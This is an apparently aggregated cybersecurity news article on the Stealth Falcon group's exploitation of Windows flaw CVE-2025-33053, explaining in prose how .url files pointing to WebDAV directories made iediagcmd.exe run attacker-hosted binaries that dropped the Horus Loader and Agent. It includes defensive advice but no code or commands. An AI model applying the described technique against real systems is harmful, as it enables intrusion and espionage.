Listen to this Post
Espionage in the Shadows: Stealth
In a chilling revelation that highlights the ongoing cybersecurity threats facing government and defense sectors, the notorious hacking group known as Stealth Falcon, also referred to as FruityArmor, has been caught exploiting a previously unknown Windows vulnerability. This zero-day flaw, now identified as CVE-2025-33053, enables remote code execution (RCE) via the WebDAV protocol. The campaign, which began in March 2025, targeted sensitive institutions across Turkey, Egypt, Yemen, and Qatar — with stealthy delivery methods designed to bypass traditional security layers and operate undetected.
Discovered by researchers at Check Point, the vulnerability hinges on improper directory handling in legitimate Windows executables. Specifically, when a malicious URL file (.url) sets a WebDAV path as its working directory, Windows tools such as iediagcmd.exe can be tricked into executing harmful code hosted on remote servers. This tactic allows attackers to inject and execute malware without leaving behind traces on the local system. Despite Microsoft’s release of a patch to fix the vulnerability, the exploitation highlights an urgent need for rapid patch management and elevated monitoring, especially in sectors dealing with national security.
Stealthy Threats from Within: How Stealth Falcon Breached the Lines
A new cyberespionage wave has emerged, revealing how Stealth Falcon weaponized a zero-day Windows vulnerability to infiltrate high-value targets in the Middle East. The flaw, CVE-2025-33053, was exploited in a campaign beginning in March 2025. It enables remote code execution through a sophisticated misuse of how Windows system tools execute commands based on directory hierarchy. The group used deceptive .url files masquerading as PDFs sent via phishing emails. Once opened, these files directed the system to launch iediagcmd.exe — a legitimate diagnostic tool — from a fake WebDAV-hosted directory.
Instead of accessing standard Windows files, the system was manipulated into launching malicious files from the attacker’s server. One such file was a counterfeit version of route.exe, which dropped a malware loader named ‘Horus Loader’. This loader deployed ‘Horus Agent’, a powerful implant capable of system reconnaissance, command execution, shellcode injection, and file operations. The operation also included post-exploitation tools such as a credential dumper, a stealthy keylogger, and a passive network backdoor.
Stealth Falcon, active since 2012, has long focused on espionage in the Middle East. Previously known for using Apollo agents, they now deploy Horus-based tools — a sign of increased sophistication and stealth. While no successful breaches were confirmed, Check Point stresses that the exploit was actively used and functional. Microsoft has since patched the flaw in a recent update. Experts strongly advise immediate patching or blocking WebDAV traffic if patching isn’t feasible. The case underscores the growing gap between exploitation and detection, especially when adversaries employ legitimate tools for illegitimate ends.
What Undercode Say:
The exploitation of CVE-2025-33053 by Stealth Falcon
From an attacker’s perspective, using .url files to hijack the working directory of trusted executables is both clever and minimalistic. The reliance on built-in Windows functionalities such as Process.Start() allows malware to run in a fileless manner, often bypassing endpoint detection and response (EDR) systems. The introduction of the Horus Loader and Horus Agent further highlights the modular design of modern malware. These tools are capable of dynamic execution and post-exploitation activity, proving that Stealth Falcon is advancing its toolset to stay ahead of security defenses.
Another disturbing aspect is the targeting of defense and governmental institutions. This isn’t just opportunistic hacking — it’s strategic espionage. The regional focus (Turkey, Yemen, Qatar, Egypt) aligns with geopolitical interests, suggesting that the attackers may be state-backed or at least state-aligned. While Check Point reports that the attempted attacks may not have succeeded, the capability and intent are both clearly present.
This incident also casts a spotlight on the lingering threat of WebDAV. Though it’s an older technology, it remains in use and is often neglected in security protocols. Attackers leveraged it precisely because it’s rarely monitored. Organizations need to reassess legacy protocols still running in their environments and segment or disable those that are no longer essential.
Finally, the delayed detection of this vulnerability until after it was weaponized reinforces a troubling truth: the defenders are still playing catch-up. Even with Microsoft’s patch now available, the gap between exploitation and patch deployment leaves a vulnerable window — especially for large or under-resourced organizations. Automated patching, behavior-based detection, and proactive threat intelligence sharing are more crucial than ever. This attack is a sobering example of how subtle, fileless techniques can outmaneuver traditional defenses, and a call to modernize security postures to meet the challenge.
Fact Checker Results ✅🛡️
✔️ The vulnerability CVE-2025-33053 is real and confirmed by Check Point and Microsoft
✔️ Stealth Falcon (aka FruityArmor) was actively exploiting this flaw in March 2025
✔️ Microsoft released a security patch addressing the issue in the June 2025 Patch Tuesday update
Prediction 🔮📊
As APT groups continue to prioritize stealth and precision, fileless attacks exploiting legitimate tools will become more common. Expect increased misuse of system processes and obscure protocols like WebDAV. Organizations that fail to monitor internal behaviors and legacy components may become prime targets for the next wave of nation-state espionage campaigns. Future exploits may go even deeper, blending into system processes so seamlessly that traditional antivirus and EDR will need a serious overhaul to keep up.
References:
Reported By: www.bleepingcomputer.com
Extra Source Hub:
https://www.stackexchange.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
